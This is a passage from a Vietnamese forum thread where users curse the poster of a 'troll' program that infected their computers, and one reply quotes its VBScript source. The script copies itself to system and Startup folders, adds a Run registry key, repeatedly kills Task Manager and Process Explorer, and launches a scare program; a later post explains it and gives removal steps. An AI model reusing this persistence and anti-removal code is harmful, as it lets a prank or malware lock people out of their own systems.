Reply
 
Thread Tools
  #381  
Old 05-01-2013, 17:35
LeeSunHae LeeSunHae is offline
K.I.A
Join Date: 12-2012
Posts: 482
Re: [Hội những người thích troll]Ứng dụng để troll

ít khi chửi nhưng xin chửi thớt 1 phát

Đụ Mẹ mày

dính cái troll ver 8 mở facebook nó lên web sex bị bà già chửi làm tao mò 1 buổi
Reply With Quote
  #382  
Old 05-01-2013, 17:46
LeeSunHae LeeSunHae is offline
K.I.A
Join Date: 12-2012
Posts: 482
Re: [Hội những người thích troll]Ứng dụng để troll

khuyên anh em không nên sử dụng
Reply With Quote
  #383  
Old 05-01-2013, 18:09
Ms.Ha Ms.Ha is offline
K.I.A
Join Date: 12-2012
Posts: 41
Re: [Hội những người thích troll]Ứng dụng để troll

đm thằng thớt, cài xong zô web ra 1 đóng xxx. Làm sao fix đây
Reply With Quote
  #384  
Old 05-01-2013, 19:46
LeeSunHae LeeSunHae is offline
K.I.A
Join Date: 12-2012
Posts: 482
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by Ms.Ha View Post
đm thằng thớt, cài xong zô web ra 1 đóng xxx. Làm sao fix đây
dinh cai hamster a
Reply With Quote
  #385  
Old 05-01-2013, 21:19
canmotkhoanglang canmotkhoanglang is offline
K.I.A
Join Date: 06-2012
Posts: 3
Re: [Hội những người thích troll]Ứng dụng để troll

đm chủ thớt
ra đường mà gặp chủ thớt e đập chết cm chủ thớt luôn, làm mày mò cả tiếng đồng hồ..
Reply With Quote
  #386  
Old 05-01-2013, 21:33
canmotkhoanglang canmotkhoanglang is offline
K.I.A
Join Date: 06-2012
Posts: 3
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by LeeSunHae View Post
ít khi chửi nhưng xin chửi thớt 1 phát

Đụ Mẹ mày

dính cái troll ver 8 mở facebook nó lên web sex bị bà già chửi làm tao mò 1 buổi
:roft::roft::roft::roft::roft::roft::roft::roft::roft:
Reply With Quote
  #387  
Old 06-01-2013, 09:24
Chicharito[14] Chicharito[14] is offline
K.I.A
Join Date: 11-2012
Posts: 23
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by mistake37 View Post
Source v9 hay v11 gì éo biết, đậu má thằng thớt

Code:
Set objRandom = CreateObject( "System.Random" )

Set wshShell = CreateObject("WScript.Shell")

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFolder = objFSO.GetFolder(".")randomfolder =  "c:\windows\system32\" & objRandom.Next_2( 1000, 9999 ) & "\"

objCreate = objFSO.CreateFolder(randomfolder)

randomname = randomfolder & objRandom.Next_2( 1000, 9999 ) & ".vbe"

parama = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + randomname + chr(34)

paramb = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" + chr(34)

paramc = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" + chr(34)

wshShell.Run parama , 0, True

wshShell.Run paramb , 0, True

wshShell.Run paramc , 0, Truereg = "wscript.exe //b //nologo " + chr(34) + randomname + chr(34)do

sleeptime = objRandom.Next_2( 10, 40 )

wshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TurboTv11", reg, "REG_SZ"

dteWait = DateAdd("s", sleeptime, Now())

Do Until (Now() > dteWait)

if wshShell.appactivate("Run") then wshShell.sendkeys "%{F4}" 

if wshShell.appactivate("System Configuration") then wshShell.sendkeys "%{F4}" 

wshShell.Run "taskkill /im taskmgr.exe", 0, True

wshShell.Run "taskkill /im taskmgrs.exe", 0, True

wshShell.Run "taskkill /f /t /im procexp.exe", 0, True

wshShell.Run "taskkill /f /t /im procexp64.exe", 0, True

Loop

wscript.Sleep sleeptime

wshShell.Run "C:\Windows\Web\Scary.exe"

wscript.Sleep 5500

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

loop
Là sao vậy thím . Mà có cái thuốc nào kill hết mấy cái ver luôn ko .Mẹ thấy hay vô facebook share cho mấy đứa bạn chơi .giờ mang nhục tết này tụi nó rủ đi chơi giờ xong con mẹ luôn rồi
Reply With Quote
  #388  
Old 06-01-2013, 09:44
truongbinhtran's Avatar
truongbinhtran truongbinhtran is offline
Senior Member
Join Date: 07-2012
Location: ♪♫ ♪♫ hikikomori ♪♫ ♪♫
Posts: 3,938
Re: [Hội những người thích troll]Ứng dụng để troll

__________________
Home: https://tranbinhtruong.com
Reply With Quote
  #389  
Old 06-01-2013, 10:17
death_lover1 death_lover1 is offline
K.I.A
Join Date: 03-2012
Posts: 134
Re: [Hội những người thích troll]Ứng dụng để troll

thử cái đầu tiên ra xvideos éo dám thử tiếp
Reply With Quote
  #390  
Old 06-01-2013, 10:32
mistake37 mistake37 is offline
Senior Member
Join Date: 02-2007
Posts: 1,876
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by Chicharito[14] View Post
Là sao vậy thím . Mà có cái thuốc nào kill hết mấy cái ver luôn ko .Mẹ thấy hay vô facebook share cho mấy đứa bạn chơi .giờ mang nhục tết này tụi nó rủ đi chơi giờ xong con mẹ luôn rồi
Tớ chỉ run v9/11 thôi.

1. Extract files vào thư mục C:\Windows\Web (2 files, 1 Scary.exe và 1 file .vbe)
2. Auto start file vbe (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup đối với Vista,7,8 và C:\Documents and Settings\All Users\Start Menu\Programs\Startup đối với XP)
3. Thêm khóa Registry (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TurboTv11)

Cách giải khi lỡ chạy

1. Start>Run>cmd >enter
gõ lệnh

taskkill /f /im wscript.exe
taskkill /f /im Scary.exe

2. Vào thư mục C:\Windows\Web xóa 2 files nói trên
3. Vào startup và registry xóa file và khóa TurboTv11

Xong.
Reply With Quote
Reply

« Previous Thread | Next Thread »
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT +7. The time now is 21:21.